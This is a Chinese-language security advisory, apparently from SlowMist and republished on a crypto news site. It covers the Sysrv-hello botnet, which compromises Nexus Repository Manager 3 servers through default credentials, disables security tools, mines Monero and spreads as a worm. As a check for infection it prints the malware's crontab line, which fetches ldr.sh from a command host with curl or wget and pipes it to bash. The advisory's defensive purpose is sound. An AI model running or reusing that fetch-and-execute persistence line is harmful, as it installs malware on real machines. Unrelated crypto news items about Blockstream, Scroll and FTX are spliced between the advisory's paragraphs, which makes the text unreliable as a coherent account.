攻击路径
Sysrv-hello僵尸网络对云上NexusRepositoryManager3存在默认帐号密码的服务器进行攻击,Maven私服部署会用到NexusRepositoryManager3,由于Maven是个流行服务,所以也给了Sysrv-hello僵尸网络的大范围感染机会。
当NexusRepositoryManager3服务对外网开放且存在默认账号密码时,Sysrv-hello就可以直接扫描入侵,利用NexusRepositoryManager3的Tasks功能模块直接运行恶意脚本达到入侵服务器的目的。
Blockstream联创:很早就决定不发币:金色财经报道,区块链基础设施公司Blockstream联合创始人兼首席财务官Erik Svenson表示,加密行业在过去的一年里表现不佳,随着监管审查的加强和投资者的怀疑,资本配置已从2021年的高点大幅回落,这使得许多年轻的初创公司难以筹集资金,这也正在影响比特币生态系统。Svenson表示,比特币赛道本身一直是一个资本不足的领域,但他表示:“我们很早就决定不发行自己的代币,我们没有像许多项目那样进行ICO,因此我们一直依赖更传统的风险投资”。
根据PitchBook的数据,Blockstream在1月底筹集了1.25亿美元,使其总资金达到约4亿美元。截至2022年8月,该公司投后估值为24.9亿美元。[2023/8/26 10:03:24]
入侵到服务器后会自动下载执行ldr.sh文件,该文件主要功能:1.禁用Linux服务器防火墙(ufw)及清空iptables2.删除aliyun、yunjing等主机安全软件3.禁用apparmor、selinux、watchdog等安全机制4.删除其他竞品5.下载门罗币挖矿程序进行挖矿,文件与进程名为network016.下载第二个木马sysrv进行更高级操作7.在crontab里加上尾巴
Scroll成为ETH Beijing黑客松的协办方及赞助方:据官方消息,以太坊 zk-rollup 扩容项目 Scroll 成为 ETH Beijing 黑客松的协办方及赞助方,用户可以从官方链接报名参与 ETH Beijing 黑客松。[2023/3/10 12:53:48]
第二个木马sysrv的主要功能:1.确保门罗币挖矿程序network01正常运行2.进行蠕虫传播,随机扫描其他IP服务,同样进行NexusRepositoryManager3漏洞利用,同时也会尝试入侵MySQL、Tomcat、WebLogic等服务
FTX前营销负责人:SBF此前一直谎称FTX没有动用客户资金:11月20日消息,FTX前营销负责人Nathaniel Whittemore近日在CoinDesk播客节目中表示,SBF此前反复承诺FTX没有动用客户资金,但“这是一个谎言”。
Whittemore表示,他和交易所的大多数其他员工都不知道有关FTX挪用客户资金的欺诈行为。员工们被蒙在鼓里,他们中的许多人(尤其是FTX的非美国员工)把交易所当成银行使用,不知道自己的积蓄被挥霍殆尽。
Whittemore说,币安放弃对FTX的救助后,“你可以想到普通FTX员工心情是多么的悲痛。那时,他们似乎不单单是可能失业,还可能面临所有积蓄化为乌有。”[2022/11/20 22:09:26]
自查方法
进程:network01sysrv
文件:/tmp/network01/tmp/sysrv/tmp/flag.txt
crontab:echo"*/9****(curl-fsSL$cc/ldr.sh||wget-q-O-$cc/ldr.sh)|bash>/dev/null2>&1"|crontab-
端口:52013
存在以上这些,停止备份样本后删除。
加固建议
删除NexusRepositoryManager3Tasks里的恶意代码NexusRepositoryManager3严禁外网访问,严禁默认账号密码NexusRepositoryManager3升级为最新版本被入侵服务器备份重要数据后,重配置或重做检查被入侵服务器是否存在直接访问生产网其他服务的能力,存在则在生产网其他服务所在的服务器上进一步分析是否有异常免责声明:作为区块链信息平台,本站所发布文章仅代表作者个人观点,与链闻ChainNews立场无关。文章内的信息、意见等均仅供参考,并非作为或被视为实际投资建议。
本文来源于非小号媒体平台:
慢雾科技
现已在非小号资讯平台发布68篇作品,
非小号开放平台欢迎币圈作者入驻
入驻指南:
/apply_guide/
本文网址:
/news/9606255.html
免责声明:
1.资讯内容不构成投资建议,投资者应独立决策并自行承担风险
2.本文版权归属原作所有,仅代表作者本人观点,不代表非小号的观点或立场
上一篇:
深入解析MakeDao在新周期里的机遇和风险
郑重声明: 本文版权归原作者所有, 转载文章仅为传播更多信息之目的, 如作者信息标记有误, 请第一时间联系我们修改或删除, 多谢。